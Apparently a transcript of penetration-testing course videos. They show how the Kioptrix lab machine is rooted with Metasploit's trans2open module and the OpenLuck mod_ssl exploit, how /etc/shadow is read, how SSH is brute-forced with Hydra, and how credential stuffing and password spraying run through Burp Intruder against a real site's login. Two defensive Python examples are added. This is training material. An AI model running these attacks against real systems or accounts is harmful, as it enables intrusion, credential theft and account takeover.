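The handler side has to match whatever you end up with: a staged payload needs the matching stager on the listener, and swapping reverse for bind changes who connects to whom, exactly as the reverse/bind discussion above lays out.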
I am excited, and let me tell you how excited I am: this is not the first time I've recorded this video, this is actually the second time, because the first time I forgot to hit the record button. So now it's blinking red right in front of me, guaranteed recording, and I'm still as excited, even the second time walking through this, because this is what we've been building up for. This is everything we've been doing: the scanning, the enumeration, even the Linux and the Python, this is all building up to this, and now we're ready to exploit. We're going to get our first shell, we're going to pop our first shell today, and I'm so excited for both of us. So what we're going to do is run Metasploit for this one. Metasploit's a little bit automated, but that's okay; in the next video we're going to go ahead and cover it manually. So what we're going to do is attack SMB here, and with SMB, if you don't remember, we ran searchsploit samba 2.2: we found Samba 2.2.1a, we searched around, we went out to the interwebs, we did searchsploit, and we kept seeing this trans2open show up, like here and here, here, here, all down here, right, repeatedly, and it meets the criteria, everything seems to make sense; it had that IPC$ anonymous connection as well. So I think this is a winner and we're going to go ahead and give it a try. So I'm going to copy this and we're just going to go ahead and type in msfconsole and load up Metasploit. Once Metasploit loads we're going to go ahead and just search for this guy and see if we can't find it. Now we know it exists because we did find that handy-dandy Rapid7 website that said it did, so we're going to search it here, and we're given four options. Now these are all operating systems here, but we have been good enumerators and good investigators, researchers, information gatherers, etc. We could have willy-nilly just seen port 139, said, hey, I'm going to try to find exploits against it, and never
looked at any other ports, but that's not us. We went out to port 80, we saw that it was running Red Hat, we discovered Linux on the machine, so we know we're going to pick the Linux module. So we're going to say use 1, as that corresponds to this module here, and then we're going to type in options, and all we have to do is set an RHOST. Remember, RHOST stands for remote host, or the victim that we're attacking, so we're going to say set rhost 192.168.57.134, and we're going to say options one more time to make sure that actually set in there, and it did. Now one thing I like to do is type in show targets. There are no targets here, but as you're going to see later on in the course there are often targets that we have to pick from; it's not always the case that the first choice that's auto-selected is right for us, but in this instance there's only one choice, so it's the right choice. So now we have two options and both are going to do the same thing for us: we could type in run, or we could type in exploit if we want to be cool. I want to be cool, let's type in exploit. So we're going to run this and it's going to start this brute force attack here, and it's going to start opening shells and closing shells. What is going on? So let's Ctrl+C; if yours is doing this, go ahead and Ctrl+C to interrupt it, and let's talk about what's happening. So you see it's trying this brute force attack, it's trying different return addresses here, and finally it lands on one that works and it says, hey, I'm going to send this stage. "Sending stage" is always a good sign, by the way. Then it says, hey, I've got this Meterpreter session open, because our payload has worked, and then this Meterpreter session closed, reason: died. That's not good. So it keeps going through over and over and over and over and it's just dying. What is going on? Well, we've talked about this. Let's go into options again. Now you don't see this the first time you do it, but you see it the second time, because Metasploit says, hey, if your
payload's not working, maybe the payload's the issue, and I'm going to give you payload options this time around. Now we see payload options here in the middle that weren't there before. We can see that we're running linux/x86/meterpreter/reverse_tcp. What does that mean? Well, that means we are running a staged payload. A couple of other things to note while we're in here: we see LHOST, which is the opposite of RHOST. LHOST is us, we are the listening host, so we sit here and we have our IP address. Sometimes this auto-selects correctly, sometimes it doesn't; in this case it did. And then we have the LPORT, which is by default 4444. So that's fine for now, it's fine for these lessons, but when you get into actually running this in the wild, 4444 is probably going to get you picked up pretty quick, because this is the default Meterpreter port, so if some antivirus or detection software sees a connection on port 4444 open up, this is going to trigger an alarm. But anyway, for this course you're not going to need to worry about it too much right now. We're going to go ahead and set a payload. We're going to say set payload, and how do we know what payload to pick? Let's just start typing out linux and hit Tab, and it auto-completes the x86 part for us, and then let's just hit double Tab. All right, now with double Tab, that's great, look at the payload options we have: we've got a bunch. Now we've got a bunch of Meterpreters, but unfortunately they're all staged payloads here. I love a good Meterpreter shell, and you guys will understand why as we move forward, but as of right now it doesn't look like we're going to be able to use one. We come over to this right column here and you can see that we've got other shells as well, and we come down, and finally down here we've got a few options that are non-staged. So let's go ahead and try this shell_reverse_tcp right here. You can just start typing that out and it should auto tab-complete for you. Go ahead
and hit Enter, then hit options one more time to make sure that this actually took. You can see here that it actually picked up, and now let's go ahead and try to run this and see if it happens. Fingers crossed. Hey, look at that! So we've got a shell now and it says command shell session 5 opened. Let's try whoami: root. hostname: kioptrix level 1. We have successfully rooted this machine. Root is the commander of the system; we cannot go any deeper than this. We own this machine hands down, it's our machine. So congratulations, you have made it this far, this is your first rooted machine, you should be very proud, pat yourself on the back, you're awesome. So from here we're going to go ahead and focus on port 80 and 443 and how we can exploit those manually, and then we'll move on to some other exploitation techniques. But for now congratulate yourself, you have your first shell, I'm very excited for you, so I'll catch you over in the next video as we start some manual exploitation. So we have gained root with Metasploit, but now we need to gain root with some manual exploitation. So remember, earlier we discovered that we had an exploit for mod_ssl, and we're going to see what we can do about it. So we went to Google and we researched mod_ssl and we came up with something called OpenLuck, if you remember that. So we clicked on this OpenLuck here, and this is the same as the one that is out there on Exploit Database, but it is fixed; remember, the Exploit Database one is broken, so we'd rather use this one that is fixed. So what we're going to do is follow the instructions here, and this is very well laid out: it tells you to git clone this, we need to do an install of an SSL dev library, we need to compile, and then run the exploit. So very, very straightforward. We're going to go ahead and do exactly what it says, so let's go ahead and just copy this first line here, and I'm going to make this a little smaller, go into a terminal, and I actually have a folder for
Kioptrix; I'm going to cd into it, and then we're going to go ahead and just paste that line and it will git clone everything. If we ls now we see that it is there, so let's cd into that folder (the one with the bad word in its name) and ls, and now you can see that there is just the .c file here and the README. So what we're going to do is install this libssl-dev. We're going to say apt install and then libssl-dev, like this, hit Enter, and then just hit Enter again because it says yes already. This will take just a second to install, and then once it does we're going to use a tool called gcc, which is a compiler. So if you've never used C or aren't familiar with C: we have a C file, but this isn't ready to use, we have to compile that C file in order to actually use it. So that's what we're doing here: we're downloading a little bit of stuff to actually be able to compile. gcc is built in and we just needed some other things additionally. So now we're going to say gcc, and typically you say -o for the output, so we can call it whatever we want; we'll just call this open, and then we'll just specify the file (you can start typing it and then Tab out), and then it says this -lcrypto, which is important. Hit Enter, okay, and then hit ls, and you see now in pretty green it's lighting up and saying, hey, we're executable. We have our executable, right, we have our program that we can run. So we could say ./open and run it, and you can see in here all the different options that this runs against. So you remember when it was brute forcing the last one, when we saw trans2open was kind of doing brute force? In theory this is what it could do as well, but here we actually have to pick a return address based on our target machine. So we're going to look at the usage; I always like to run the application without any arguments to see what the usage is, and we need to give it a target, which is one of these down here, then the box IP address, then we can select a port, maybe; it
says it's for an SSL connection; we're not going to be using an SSL connection, so don't worry about that, and then a -c number, and it says use a range of 40 to 50 if you don't know. So our syntax is going to look something like ./open, one of these offsets that we're going to pick, the box IP address, and then a -c of probably 40. So how do we find what we're looking for? Well, I'm going to cheat just a little bit and tell you guys to scroll down, down, down, down, down, and if we look at 0x6b here, remember we were up against Apache 1.3.20; see, enumeration comes into play big time. So Apache 1.3.20: now there are two we can run against. I'm picking this one, I believe it's the more stable one, so we could pick either one, but I would choose b; I think a doesn't work all the time. So let's choose b here: Apache 1.3.20 is the indicator, and again Red Hat Linux, so that's another indicator. So let's copy this so we don't forget it, and we're just going to scroll down and we're going to say, hey, ./open, and we're going to paste that 0x6b, and then we're going to run this against the IP address, because it said box was next, so .134, and then remember we had to give a -c of 40. So that is the syntax. Sometimes you have to follow along, and I don't think most of them are as confusing as this; when you say this is confusing, I would just say it's pretty lengthy for an exploit, because you have to go through all the different offsets here to find the right offset and actually fire this off. But you have the opportunity here to actually read the usage and just understand your way through it, so once you get this little syntax and all this part down, it's really not that bad. So to check off the list: we've got the target, we've got the box IP address, we don't need the port because we're not running against SSL, we're just going to run this against port 80, and then we're going to run -c of 40.
So let's go ahead and try to fire that off and see what happens here, and this may just take a second. Okay, it says it's spawning a shell; now we wait for the SUID. Let's scroll up just a little bit while we're waiting here to see. So it looks like it sent the shellcode and it spawned a shell; it says, hey, we have no job control in this shell, and then it has a shell here, bash 2.05, that is a shell, and then it's going in and it's doing some wgets. Now, this machine is able to get out to the internet, so it's going to go ahead and try to do wgets against these, it's going to keep downloading, and it's going to get the response here. Okay, and now it says wait for the shell, because it saved this .c file here, and let's see if maybe we already have a shell: whoami, root. Look at that! So it looks like it downloaded something and allowed us to privilege escalate here, and let's say hostname, okay. So we've gone through and we've rooted this machine with Metasploit, and now we've gone through and rooted this machine with the manually downloaded exploit. So there's two options. You're going to find out that Metasploit is a more robust and popular option, especially as a penetration tester. Now there is a common misconception, or thought process, put out there by certifications; the OSCP, for example, doesn't let you use a lot of Metasploit, only one instance of Metasploit on their exam, so everybody thinks, man, I really shouldn't use Metasploit. But you're going to see in this course how useful it really is and how robust it is, and if you talk to a penetration tester, they're going to use the best tools available to them. The certifications out there that do that are making it harder to pass the exam intentionally rather than for practicality; this course is all about practicality. So from here, now that we've exploited it manually, let's talk about a couple of things that we look for in post, post being post-exploitation, and we're going to cover this over and over and over
again; we're not going to get into it fully right now, I just want to give you an idea as to the thought process. So the first thing to think about is, what is our IP address? We could say ifconfig if it'll allow us to; it depends on what kind of shell we're in, and see, this one is a weird shell. We could try ip a; it's still not going to be found. If we try some commands like arp or route, I doubt they're going to be found right now either, but we want to look at the routing table, the ARP table; we want to see if this machine is what's called dual-homed, and you're going to learn more about that when we get into pivoting. But if this machine has two NICs, and we're on one network and the other NIC is on a second network that we never saw before, then maybe we can do something called pivoting and move into that new network. We would be able to identify who the machine's talking to with an ARP table or a route. We could also look at sudo privileges, so we could say something like sudo -l, but we are root, so we can run as everybody. A sudo user, as we talked about in the Linux lessons, is able to run commands elevated, but here we are root, so we are obviously already elevated. Other things that we can do: we can cat what's called the /etc/passwd file. Now this is very misleading, because the /etc/passwd file used to be the password file; now it just holds a placeholder. So you can see all the users that are on this computer, root being this one; there are a lot of built-in users here, but if you always scroll down to the bottom, where the UIDs start at 500, that's where your users start. So there are actually two users on this computer as well: one is named john, the other is named harold. So we look at these users and we say, okay, well, there's no password in this password file, but there used to be, back in the day, and that's why they call it this, and now they moved it to this placeholder of an x, and what we can do is we can come in
here and we can say, hey, cat /etc/shadow, and now you see the hashes are in here. So these hashes are what the x is placeholding for. We can actually combine both of these files with a tool, go offline, and try to crack these; we'll work on that later on in the course, but just for now, to get your wheels spinning as to what we can do with root-level access: we need to start enumerating again, looking at files on the computer, seeing what's out there and what we can do with it. But we'll get into post-exploitation techniques and thought process as we go through the Active Directory portion of the course, because I think it goes hand in hand, and we can talk about password cracking there and how to attack some of this stuff; there will be a password cracking video on Linux as well when we get into the post-exploitation phase of this. But that's really it for now. So we've got the shadow file, we could take this offline and try to crack it, we can enumerate files, we can try to, you know, break into user folders and see what they've got in there, maybe they've got password files stored in there, etc. So from here we have rooted this machine twice: we rooted it with Metasploit, we rooted it manually, and now we can start moving on. I do want to show you a few more attacks, so here's what's going to happen over the next few videos: we're going to talk about brute force attacks really quick on SSH, we're going to talk about credential stuffing (we're going to revisit that concept that we talked about in information gathering), and then we're going to look at our notes and just compare notes and see where we're at with findings and everything else. After that we're going to get into what I like to call the mid-course capstone, which is going to allow us to do a bunch of exploitation against a bunch of machines, and it should be really fun. So, end of spiel; again, I will catch you over in the next video as we talk about brute force attacks.
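The /etc/passwd and /etc/shadow walkthrough above can be turned into a quick account audit. This is an added example (my code, not the course's, run against constructed file excerpts with fake hashes) that lists the human accounts starting at UID 500, the cut-off the lesson uses for this old Red Hat box (modern distributions start regular users at 1000), and reports whether each account's secret is properly shadowed, empty, locked, or stored as a hash directly in the world-readable passwd file, plus any extra UID 0 account. The usernames beyond john, harold and root, and all hash strings, are made up for the example.

```python
# Constructed /etc/passwd and /etc/shadow excerpts with FAKE hashes (the lesson's real ones are not reproduced).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash
legacy:$1$fakesalt$fakefakefakefakefakefa:502:502::/home/legacy:/bin/bash
guest::503:503::/home/guest:/bin/bash
toor:x:0:0::/root:/bin/bash
"""
SHADOW = """\
root:$1$fakesalt$fakefakefakefakefakefa:15000:0:99999:7:::
bin:*:15000:0:99999:7:::
daemon:*:15000:0:99999:7:::
john:$6$fakesalt$fakefakefakefakefakefakefakefakefakefakefakefakefakefakef:15000:0:99999:7:::
harold:!!:15000:0:99999:7:::
toor:$1$fakesalt$fakefakefakefakefakefa:15000:0:99999:7:::
"""

# crypt(3) hash identifiers; the prefix tells you which cracking mode a hash needs later on.
HASH_IDS = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
            "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}


def parse_colon_file(text):
    """Map the first field (username) to the list of colon-separated fields."""
    entries = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            fields = line.split(":")
            entries[fields[0]] = fields
    return entries


def describe_secret(value):
    if value == "":
        return "EMPTY (no password required)"
    if value.startswith(("!", "*")):
        return "locked"
    for prefix, algo in HASH_IDS.items():
        if value.startswith(prefix):
            return algo
    return "unknown (possibly legacy DES crypt)"


def audit(passwd_text, shadow_text, min_uid=500):
    """Report every UID 0 account and every account with uid >= min_uid (500 here, per the lesson's
    Red Hat box; modern distributions start regular users at 1000)."""
    passwd = parse_colon_file(passwd_text)
    shadow = parse_colon_file(shadow_text)
    report = {}
    for user, f in passwd.items():
        uid = int(f[2])
        if uid != 0 and uid < min_uid:
            continue  # system account
        issues = []
        if uid == 0 and user != "root":
            issues.append("extra UID 0 account")
        pw = f[1]
        if pw == "x":                      # the placeholder the lesson describes: look in shadow
            entry = shadow.get(user)
            secret = describe_secret(entry[1]) if entry else "MISSING shadow entry"
        elif pw == "":
            secret = describe_secret(pw)
            issues.append("empty password field in /etc/passwd")
        else:
            secret = describe_secret(pw)
            issues.append("hash stored in world-readable /etc/passwd")
        report[user] = {"uid": uid, "shell": f[6], "secret": secret, "issues": issues}
    return report


if __name__ == "__main__":
    for user, info in audit(PASSWD, SHADOW).items():
        print(f"{user:8} uid={info['uid']:<4} {info['secret']:32} {', '.join(info['issues']) or 'ok'}")
```

Reading the two files side by side like this is also what the "combine both files with a tool" step in the lesson does before cracking: the audit shows which accounts even have a crackable hash (john, root) and which are locked or passwordless, which is worth knowing before any offline work starts.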
In a previous video we discussed SSH, and that it's really not always that much of a low-hanging fruit. So we've got SSH here and say we want to attack it. Now there are three reasons we're going to do this, and this is from a realistic perspective: if we see SSH on an assessment, we're going to try to brute force against it or use weak or default credentials, and we're going to do that because, one, we're going to test password strength; two, we're going to see if we can get in with a weak password or default password, and if we can, that also attests to password strength, correct; and three, we're going to see how well the blue team performs. Do they catch us? Do they see us brute forcing? This should be something that alerts when it is being performed, but you would be surprised how often it does not. So during a pen test I am as loud as possible. This is not a red team assessment where we're trying to be quiet; this is a pen test where we are as loud as possible and we are hoping to be caught, or at least told to tone it down a little bit, you know, hey, we're seeing you, can you be more quiet. We just want to be caught sometimes so we can give kudos in a report and say, hey, you saw scanning here and here, kudos to you, but you didn't see us scanning here and here. So this is how we really help fine-tune a blue team, and help fine-tune a client as well: by being loud sometimes. So we're going to practice being loud today, and we're also going to practice brute force attacks, and we have the perfect opportunity to do that with an SSH port being open on this machine. So what we're going to do is use a tool called Hydra, and then I'll show you the Metasploit way as well. So Hydra is a brute force tool, and the syntax for Hydra is going to be this: we're going to say hydra, and then we're going to give a -l for the user that we're going to be utilizing, in this case I want to attack root, and then we're going to give a capital P (-P) for the password list. So if we want to use a list of users instead of the single user with -l,
we can just say capital L (-L) instead, but here we're going to say capital P (-P) for the password list, and then we're just going to say /usr/share/wordlists/metasploit, and I'm just going to double Tab in this folder so you can see how many wordlists are actually in here. There are quite a few wordlists, and you can space, space, and it has wordlists for all different kinds of things built in, and these are all over Kali, so it's good to know your folder locations, but /usr/share/wordlists is one that we'll use quite a bit. What we're going to do is utilize an attack with these Unix passwords here. So we have unix_users and unix_passwords; we're going to utilize the unix_passwords list and just try to brute force with that, so we'll say unix_passwords, something like that. Then we're going to need to specify what we're attacking, so we are attacking ssh, like this, and the IP address of the machine we're attacking, on port 22, and then we need to set a certain number of attempts, or threads, at once, and we're going to limit that to four (-t 4), and then I'm going to do a capital V (-V) for verbosity, just because I want to see the user attempts flow through so we can actually see what's going on here. So once you've got the syntax ready to go, go ahead and hit Enter, and you're going to see that it's starting to attempt root logins with all these weak passwords here, and hopefully it might find something. But let's go ahead and open up a new terminal here, and we're going to just make this a little bigger, and I'm going to load up Metasploit as well, and we're going to run the same exact thing in Metasploit, because I think it's good to know multiple frameworks and multiple tools to perform the same task. So here we're going to search for something like ssh, and this is going to be an auxiliary module, so we'll just scroll up and we're going to look for something like ssh_login. Perfect: SSH Login Check Scanner. Make sure we don't have anything else, and it looks good to me, so let's go ahead and
take this ssh_login and we're going to go ahead and say use, then options, and now we have kind of our brute force options here. Let me make this a little bigger so it's prettier. So we've got a brute force speed from 0 to 5, 5 being the fastest; try blank passwords, no, no, no; we can set a hard-coded password and we can set a hard-coded username; we can set a user file and a password file, a userpass file, user-as-password, and again we can have a password file as well. So we have a lot of different options here that we can utilize, but we're going to go ahead and do the same kind of thing: we're going to say set username and we're just going to say root, and then we're going to say set pass_file, and similar to what we just used, we're going to say /usr/share/wordlists/metasploit and then unix_passwords (not the Linux one, sorry, the Unix one), and that should set the pass file. Then we just need our RHOSTS as well: set rhosts, and we'll say 192.168.57.134. Say options one more time and you can see that we've got our password file set, we've got our RHOSTS set, we've got our port on 22, threads is 1, username root, and we should be good to go. Now we can set multiple threads here, we could set threads to, like, 10; this is really going to amp it up, I mean this should be detected in a second, but we're going to try to run it. Actually, let me Ctrl+C; let's set verbose to true as well, just so you can see that it's actually working: set verbose true. Then we're going to run this and it's going to attempt different credentials here, and if it finds one it'll say, hey, I found it, it'll light up green, and then we'll know it's good. So this is actually going kind of slow, surprisingly, and you can see here that we are at attempt 112, 116.
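The blue-team side of this brute force, which the lesson says "should alert", as an added example that is not part of the course: parse constructed OpenSSH auth.log lines, alert when one source IP produces a threshold of failed passwords inside a short window, and record any Accepted login from that IP after the alert fired, which is the sign the guessing paid off. The log format is standard OpenSSH syslog output; the hostname, the IP addresses, the timings and the year used for parsing are assumptions made for the sample.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Standard OpenSSH syslog lines: "Failed password for [invalid user ]USER from IP port N ssh2".
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def _line(sec, result, user, ip="192.168.57.139", minute=15):
    """Build one constructed auth.log line (hostname, IPs and times are made up)."""
    return (f"Mar 10 10:{minute:02d}:{sec:02d} kioptrix sshd[{1200 + sec}]: "
            f"{result} password for {user} from {ip} port {51000 + sec} ssh2")


# A Hydra-style burst against root, then a success from the same source, plus benign noise.
SAMPLE_LOG = (
    [_line(s, "Failed", "root") for s in range(12)]
    + [_line(20, "Accepted", "john")]
    + [_line(0, "Accepted", "harold", ip="192.168.57.10", minute=16),
       _line(5, "Failed", "invalid user admin", ip="10.0.0.5", minute=16)]
)


def parse_auth_log(lines, year=2020):
    """Return (timestamp, ip, user, result) tuples; syslog omits the year, so one is assumed."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"], m["result"]))
    return events


def detect_bruteforce(events, threshold=10, window_seconds=60):
    """Alert per source IP once `threshold` failures fall inside `window_seconds`; record any
    later Accepted login from that IP, which is the 'brute force worked' signal."""
    per_ip = defaultdict(list)
    for ev in sorted(events):
        per_ip[ev[1]].append(ev)
    alerts = []
    for ip, evs in per_ip.items():
        window, users, failures, alerted, success = deque(), set(), 0, False, None
        for ts, _, user, result in evs:
            if result == "Failed":
                failures += 1
                users.add(user)
                window.append(ts)
                while (ts - window[0]).total_seconds() > window_seconds:
                    window.popleft()
                if len(window) >= threshold:
                    alerted = True
            elif alerted:
                success = (user, ts.isoformat())
        if alerted:
            alerts.append({"ip": ip, "failures": failures, "usernames": sorted(users),
                           "success_after_alert": success})
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(parse_auth_log(SAMPLE_LOG)):
        print(a)
```

With the default `-t 4` Hydra run from the lesson, a dozen failures land inside a few seconds, so a threshold of 10 per minute fires immediately; the usernames list in the alert also distinguishes a single-account attack like this one from spraying across many accounts.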
So this is also going slow, and we do not have a successful attempt or a login. I actually don't believe that there's going to be one, but you never know; I believe I remember taking this offline and trying to crack the password, and it wasn't any kind of weak password. So you can let your brute force run if you want to go with it, but I'm going to go ahead and kill mine, and that's it for this video. So from here we're going to talk about a similar methodology called credential stuffing, which we've already talked about before, except we're not brute forcing but using common knowledge to our advantage. So we'll talk a little bit about credential stuffing in the next video. Let's talk again about credential stuffing, and while we're at it we're going to talk about password spraying. Now I realize we talked about this earlier in the course with breach-parse and WeLeakInfo, but I do think that hammering concepts over and over, and how important they are, does help with information retention. So again, if we look at this example here, what is credential stuffing? Well, it's just injecting breached account credentials in hopes of account takeover. So if you look at the compromised server here in the upper right-hand corner, we pull down usernames and credentials, and we get these from leaks like the LinkedIn leak or the Equifax leak or whatever has come out recently. We get these leaked credentials, we grab these databases, we search through them like we did with breach-parse or like we can with WeLeakInfo, and we get these stolen credentials, and we take these credentials and we try to pass them to the site login. Now we can take a look at a real-life example of that, which I have pulled up here, and again this is just an example of the Tesla breach-parse output. So we have some usernames and passwords, we have repeat offenders, remember, and we also have similar passwords here. But the art of credential stuffing is taking these passwords and these usernames and throwing them at a
website. That's all it is: we're going to throw them at a website and just kind of spray and pray. Now I've just gone ahead and opened up this same tesla-master; I've only opened up the users and the passwords just for an example of spraying. This video is going to be in theory only; I don't want you attacking Tesla's website, so just take this as an example. You can follow all the way up until the point that we actually hit attack, if you want to follow along, but please do not attempt an exploit against Tesla: you do not know when the criteria is going to change, and I just don't want you getting in trouble in case it does. So from here I'm going to go to Firefox, and while we are in Firefox, what I want to do is take a quick pit stop and go to Google and look up something called FoxyProxy. So go ahead and do this, look up FoxyProxy, like this, not froxy, FoxyProxy, and go ahead and click on this top one here, the Standard, and we're just going to go ahead and install the Standard version to our Firefox. This is going to be a useful tool that we'll be using throughout the course. So okay, we've got FoxyProxy installed. Now what has happened up in the right-hand corner: we've got this here, you can see FoxyProxy's here, and we can just say, hey, Options, and in the Options we're going to add in a proxy over here on the left, and we're just going to call it burp suite, and then over here we've got proxy types; we're just going to leave this at HTTP, and then we're going to give it an address, which is 127.0.0.1, same thing as before, and again the port is 8080.
We'll just hit Save, and then we're going to go ahead and close out, and then all we've got to do now is click this and click this, and now Burp Suite's turned on, super simple. So let's go ahead also to our applications, go up here and open up Burp Suite, and let's test out our proxy. Ignore the errors, don't worry about those; let's go ahead and hit Next and use Burp defaults, and I will give you a second here to catch up, because I realize that I might be clicking through a little fast. So once you have everything set up like this, what we're going to do is just make sure our proxy works. I'm just going to refresh the page, and you can see that it worked. So easy on, easy off, that's all we're looking for here: instead of having to go into the menu, go to Preferences and, you know, go through that whole process, all we've got to do is click a little button and we can turn it on or off within a couple of clicks. So from here I'm going to turn the intercept off and we're just going to go ahead and go to tesla.com. Tesla should look like this when you go to it; in the upper right-hand corner there is a sign-in button, go ahead and click sign in. And again, this is just a watch-and-learn exercise; you can follow along up until the point that we fire the attack. There will be opportunities here in very, very soon videos where you actually get to do this and practice along. So from here let's turn on the intercept and let's go ahead and just put a fake email, we'll just do test@test.com, and we'll do test as the password, and hit sign in, and that intercepts here. So you can see email=test@test.com and password=test. We're going to go ahead and just right-click this and say Send to Intruder, and from Intruder what we're going to do is go to Positions in here, and then we're going to Clear so all those green markers go away, because it tries to auto-select positions for us. So now what we're going to do is we're just
going to highlight this here and we're going to say add, and then we're going to highlight this here and we're going to say add. So we're selecting two different parameters, we're selecting the email parameter and we're selecting the password parameter, and now we have different attack types up here. The most common that we're going to use is either sniper, but sniper uses one parameter, so we're actually going to use what is called a pitchfork here. And we're going to go ahead and go over to our payloads, and what I'm going to do is I'm going to take this list of users and I'm just going to copy this, I'm going to paste it, and then on the second one I'm going to take my list of passwords and I'm going to paste it. Now what this is doing, if we go back, payload set 1 is all the usernames, it's going into the first one we set here; payload set 2 is all the passwords, those are all going into here. And we have 30 total counts, meaning what's happening with this pitchfork is payload one number one is corresponding to payload two number one, so they only run together. So this will run the username and password; these are just the separated users and passwords; this will run this username against this password here. So what we're going to do is just start an attack, and it just says hey, this is a demo version of Intruder because you're on Community. Don't worry about that, it still runs, it's just a little slower. I'm going to go ahead and hit pause on the attack. Now there are some interesting things that we can look for when we're doing this. What we're looking for is a status code change of some sort, maybe we see 200s here and we want like a 301, which means a redirect, or we see a significant change in length; that would be a good indicator that maybe we had a successful login. Other items too is that we can click in here and look at the response and we can say okay, what did the response say, and if we scroll down maybe it said something in here about failed
login. Okay, "we could not sign you in". And we could just take "we could not sign you in" like this, copy this, and then we can come back, we'll close this attack, we'll come into options here, and there's actually a grep feature. So we can clear all these, and in this little box we can just paste this and say yes, match this here. So watch what this does. We're going to start this attack again and then I'm going to pause it, and you can now immediately look at the check boxes. This means it's showing up in the response, it's grepping it out, it knows immediately that we didn't sign in successfully. So this is an example of a credential stuffing attack. So we're looking for these few different things: a status change, a significant length, like we're seeing all the same kind of lengths here, but what if it was like 5000 or 2000 or 15000? If the page length changes there's a good chance that you signed into something and we have a successful login. Same thing here with this, if you can find your error code or what it says and then grep on that, then you can click up here and just sort by that and you can search for the ones that don't return that and possibly have a login as well. So this is the art of credential stuffing. Now let's say we wanted to close this out, we want to go back and we want to do password spraying. Well, we're going to go ahead and just clear this out, and if you remember, password spraying is the art of using known usernames without a known password. So we'll just say add here, and we would gather a list of all the possible users that we can think of. We can look at hunter.io, we can look at, you know, the breach password list, we can look at LinkedIn and gather people who work there, come up with this big list, and then actually... sorry, no, this is right. We'll add these and we'll have all the different users, and then for this we'll just change the request to like Fall2019, or we could set this up here like Fall2019! or whatever
the time frame is, or however you want, or maybe, you know, they work at Tesla, so maybe we'll do Tesla1 if they have a weak password policy, or 123 or @ or #, you just try a few of these. The only downside to this is you are most likely attacking Active Directory accounts. When you're attacking Active Directory accounts you want to be very careful because you could lock them out without even trying. So if you're doing a pen test the best idea is to ask before you attack, say hey, how many unsuccessful attempts do you have before a lockout happens, because the worst thing you want to do is fire off 10 of these in a row, lock out a bunch of users and cause a denial of service. That is very, very possible and very, very easy to do, so make sure you're not just firing these willy-nilly, that you have a good idea of the password policy, the lockout policy, etc. That'll really help you when you do these attacks, but you just want to do these kind of one or two at a time, wait a few hours, fire another one or two at a time, and you should be good to go. Okay, so same deal here, we could fire this, and we could just say, you know, I'll just say password123, and we'll just switch this to sniper here. If we come to the payloads you can see it just kept the emails, there is no payload two anymore. So what this would do if we hit start attack is it would start firing this against this email address with a password of 123, and then this email address with the password of 123; it would just go down the list, and that's all password spraying is. But the feature that I'm showing you here, between credential stuffing and password spraying, is by far the most common way that we get in on external assessments, way, way more than you're ever going to see just an exploit out in the wild. This is where you're going to see it most likely, and second, you're probably going to see something like default credentials. So if you see a login page, always
check default credentials, because you never know. You're likely not going to see an exploit out there because, the chances are, one, if you see an exploit like that out there, who knows who else has seen that already, what kind of bad actors, because bad actors are scanning the internet all the time for these sorts of things, and if you're seeing it then guess what, they've probably already seen it as well, so that's a bad situation. Two, you got to think of protection and clients. Just think of clients like a house. When you talk about the external of your house, your doors have really good locks on them, you might have two locks on your door, you might have good lighting, all this other stuff, right, like to try to keep bad guys out, but on the inside some of your doors probably don't even lock. And that's really how you can treat an external assessment: the clients do a really good job of, you know, buffing up their external, but when it comes to the internal it's not usually as good. So same thing with physical assessments as well, you just gotta get inside; once you're inside it's kind of easy breezy for the most part. So take that lesson away. If anything you take from the course, again at least for the external side, take away that enumeration and information gathering are super important, because you want to get to this stage here where you are doing these credential stuffing attacks. And you can use Burp Suite for it, this is my favorite go-to; there's other methods as well, but it's so easy just to grab any different website and just, you know, intercept the proxy, send it to Intruder, make one modification and fire it off. So super, super simple. This is something that will come up in an interview as well, so make sure you're very aware of it, and make sure you watch this again if you need to understand the concepts. So from here we're going to go ahead and take a quick look at our notes in the next video, just kind of where I want
you to be with your notes, and then we're going to get into what I call that mid-course capstone, where I'm going to show you a bunch of different hacks and just my thought process and theories in thinking when I go into a scan and looking at results, just so you can kind of get into the mind of an attacker and how we think. And then we'll start moving on to exploit development and my favorite, the Active Directory exploitation. So I look forward to seeing you in the next video. Let's briefly cover our notes so far. So we have covered a little bit of this, right, we covered the fact that we have our nmap in here and what we saw in port 22, port 80, etc., and we had a couple of findings from before: we had default web page on Apache and we had this information disclosure as well. Now we've done some exploiting, so I've gone ahead and just put in here the SMB exploit, so I put an example of what it looks like when we run it, and you can see that the whoami and the hostname's in there, and then I've got the IP address. This is just for my notes; you can make this as detailed as you want, by the way. You could say hey, I ran this at this specific time and I ran it against this host and here was the attack I ran, etc., and we'll get more into what your report should look like, but at least for me, as long as I know where I have a screenshot of proof that I did it and I have the IP address that I ran it against, that's pretty much enough; I can remember the rest and then type out the report. And same here with the mod_ssl attack on port 80 and 443, and I don't have a copy of it right now, but we did uncover the shadow file as being a root user, so this just notes for us, perhaps we could use the shadow file information and crack the passwords, or we could go on and try to pass the password or pass the hash around, which we'll get to in later videos. And another thing that I added in here too was undetected malicious activity, so this is something that you're
